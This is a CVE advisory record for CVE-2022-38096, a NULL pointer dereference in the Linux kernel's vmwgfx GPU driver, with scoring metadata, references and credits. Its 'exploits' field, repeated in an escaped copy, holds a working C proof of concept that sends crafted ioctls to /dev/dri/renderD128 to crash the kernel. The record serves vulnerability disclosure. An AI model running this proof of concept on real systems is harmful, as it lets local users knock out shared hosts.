CVE-2022-38096 (GCVE-0-2022-38096)
Vulnerability from cvelistv5
Published
2022-09-09 14:39
Modified
2024-09-16 19:46
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-476 - NULL Pointer Dereference
Summary
A NULL pointer dereference vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file '/dev/dri/renderD128 (or Dxxx)'. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS).
References
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "5.14",
"status": "affected",
"version": "v4.20-rc1",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-38096",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-26T13:45:25.191519Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-26T13:49:29.690Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-03T10:45:52.802Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2073"
},
{
"name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "kernel",
"vendor": "Linux",
"versions": [
{
"lessThan": "5.13.0-52*",
"status": "affected",
"version": "v4.20-rc1",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab"
}
],
"datePublic": "2022-09-06T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "A NULL pointer dereference vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)."
}
],
"exploits": [
{
"lang": "en",
"value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint fd = 0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n {\n printf(\"open tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n \n}\nvoid poc(int sid){ \nint cmd[0x1000]={0};\ncmd[0]=1165;\ncmd[1]=0x50;\ncmd[2]=0x0;\ncmd[3]=0x0;\ncmd[4]=-1;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=2; \n\targ.context_handle=sid;\n if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n\n}\nint alloc_context(){\n\nint arg[0x10]={0};\narg[0]=0;\narg[1]=0x100;\n\nif (ioctl(fd, 0x80086447, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n return arg[0]; \n}\n\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n return arg[2]; \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\nreturn arg.flags;\n}\nint main(int ac, char **argv)\n{\ninit();\nint cid=alloc_context(); \n printf(\"%d\",cid); \n poc(cid); \n \n}"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "CWE-476 NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-25T21:08:05.642043",
"orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
"shortName": "Anolis"
},
"references": [
{
"url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2073"
},
{
"name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"source": {
"defect": [
"https://bugzilla.openanolis.cn/show_bug.cgi?id=2073"
],
"discovery": "INTERNAL"
},
"title": "There is a NULL pointer vulnerability in vmwgfx driver",
"x_generator": {
"engine": "Vulnogram 0.0.9"
}
}
},
"cveMetadata": {
"assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
"assignerShortName": "Anolis",
"cveId": "CVE-2022-38096",
"datePublished": "2022-09-09T14:39:51.163117Z",
"dateReserved": "2022-09-07T00:00:00",
"dateUpdated": "2024-09-16T19:46:43.355Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://bugzilla.openanolis.cn/show_bug.cgi?id=2073\", \"tags\": [\"x_transferred\"]}, {\"url\": \"https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html\", \"name\": \"[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update\", \"tags\": [\"mailing-list\", \"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-03T10:45:52.802Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2022-38096\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-06-26T13:45:25.191519Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*\"], \"vendor\": \"linux\", \"product\": \"linux_kernel\", \"versions\": [{\"status\": \"affected\", \"version\": \"v4.20-rc1\", \"lessThan\": \"5.14\", \"versionType\": \"custom\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-06-26T13:49:22.421Z\"}}], \"cna\": {\"title\": \"There is a NULL pointer vulnerability in vmwgfx driver\", \"source\": {\"defect\": [\"https://bugzilla.openanolis.cn/show_bug.cgi?id=2073\"], \"discovery\": \"INTERNAL\"}, \"credits\": [{\"lang\": \"en\", \"value\": \"Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab\"}], \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 6.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"Linux\", \"product\": \"kernel\", \"versions\": [{\"status\": \"affected\", \"version\": \"v4.20-rc1\", \"lessThan\": \"5.13.0-52*\", \"versionType\": \"custom\"}]}], \"exploits\": [{\"lang\": \"en\", \"value\": \"#include \u003cstdio.h\u003e\\n#include \u003cstring.h\u003e\\n#include \u003cunistd.h\u003e\\n#include \u003cerrno.h\u003e\\n\\n#include \u003clinux/if_tun.h\u003e\\n#include \u003cnet/if.h\u003e\\n#include \u003csys/ioctl.h\u003e\\n#include \u003csys/types.h\u003e\\n#include \u003csys/stat.h\u003e\\n#include \u003cfcntl.h\u003e\\n#include \u003cpthread.h\u003e\\n#include \u003csys/socket.h\u003e\\n#include \u003cstring.h\u003e\\n#include \u003cunistd.h\u003e\\n#include \u003cstdlib.h\u003e\\n#include \u003csys/ioctl.h\u003e\\n#include \u003cerrno.h\u003e\\n#include \u003cstdio.h\u003e\\n#include \u003cfcntl.h\u003e\\n#include \u003cpthread.h\u003e\\n#include \u003cstdio.h\u003e\\n#include \u003csys/types.h\u003e\\n#include \u003cstdint.h\u003e\\n#include \u003cnetinet/ip.h\u003e\\n#include \u003csys/resource.h\u003e\\n#include \u003csys/syscall.h\u003e\\n#include \u003climits.h\u003e\\n#include \u003csys/mman.h\u003e\\n\\n#include \u003clinux/fs.h\u003e\\nint fd = 0;\\ntypedef struct mixer\\n{\\n\\tint index;\\n\\tint fd;\\n\\tchar *msg;\\n}mixer_t;\\n\\nstruct drm_vmw_surface_create_req {\\n\\t__u32 flags;\\n\\t__u32 format;\\n\\t__u32 mip_levels[6];\\n\\t__u64 size_addr;\\n\\t__s32 shareable;\\n\\t__s32 scanout;\\n};\\nstruct drm_vmw_execbuf_arg {\\n\\t__u64 commands;\\n\\t__u32 command_size;\\n\\t__u32 throttle_us;\\n\\t__u64 fence_rep;\\n\\t__u32 version;\\n\\t__u32 flags;\\n\\t__u32 context_handle;\\n\\t__s32 imported_fence_fd;\\n};\\nvoid init(){\\nif ((fd = open(\\\"/dev/dri/renderD128\\\", O_RDWR)) == -1)\\n {\\n printf(\\\"open tun failed: %s\\\\n\\\", strerror(errno));\\n return -1;\\n }\\n \\n}\\nvoid poc(int sid){ \\nint cmd[0x1000]={0};\\ncmd[0]=1165;\\ncmd[1]=0x50;\\ncmd[2]=0x0;\\ncmd[3]=0x0;\\ncmd[4]=-1;\\nstruct drm_vmw_execbuf_arg arg={0};\\n\\targ.commands=cmd;\\n\\targ.command_size=0x100;\\n\\targ.version=2; \\n\\targ.context_handle=sid;\\n if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\\n {\\n printf(\\\"ioctl tun failed: %s\\\\n\\\", strerror(errno));\\n return -1;\\n }\\n\\n}\\nint alloc_context(){\\n\\nint arg[0x10]={0};\\narg[0]=0;\\narg[1]=0x100;\\n\\nif (ioctl(fd, 0x80086447, \u0026arg) == -1)\\n {\\n printf(\\\"ioctl tun failed: %s\\\\n\\\", strerror(errno));\\n return -1;\\n }\\n return arg[0]; \\n}\\n\\nint alloc_bo(){\\n\\nint arg[0x10]={0};\\narg[0]=0x10000;\\nif (ioctl(fd, 0xC0186441, \u0026arg) == -1)\\n {\\n printf(\\\"ioctl tun failed: %s\\\\n\\\", strerror(errno));\\n return -1;\\n }\\n return arg[2]; \\n}\\n\\nint create_surface(){\\nint buf[0x100]={0};\\nbuf[0]=64;\\nbuf[1]=64;\\nbuf[2]=64;\\n\\nstruct drm_vmw_surface_create_req arg={0};\\narg.flags=0;\\narg.format=2;\\narg.mip_levels[0]=1;\\narg.size_addr=buf;\\narg.shareable=0;\\narg.scanout=0x10;\\n\\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\\n {\\n printf(\\\"ioctl tun failed: %s\\\\n\\\", strerror(errno));\\n return -1;\\n }\\nreturn arg.flags;\\n}\\nint main(int ac, char **argv)\\n{\\ninit();\\nint cid=alloc_context(); \\n printf(\\\"%d\\\",cid); \\n poc(cid); \\n \\n}\"}], \"datePublic\": \"2022-09-06T00:00:00\", \"references\": [{\"url\": \"https://bugzilla.openanolis.cn/show_bug.cgi?id=2073\"}, {\"url\": \"https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html\", \"name\": \"[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update\", \"tags\": [\"mailing-list\"]}], \"x_generator\": {\"engine\": \"Vulnogram 0.0.9\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"A NULL pointer dereference vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS).\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-476\", \"description\": \"CWE-476 NULL Pointer Dereference\"}]}], \"providerMetadata\": {\"orgId\": \"cb8f1db9-b4b1-487b-a760-f65c4f368d8e\", \"shortName\": \"Anolis\", \"dateUpdated\": \"2024-06-25T21:08:05.642043\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2022-38096\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2024-09-16T19:46:43.355Z\", \"dateReserved\": \"2022-09-07T00:00:00\", \"assignerOrgId\": \"cb8f1db9-b4b1-487b-a760-f65c4f368d8e\", \"datePublished\": \"2022-09-09T14:39:51.163117Z\", \"assignerShortName\": \"Anolis\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.
Loading…
Loading…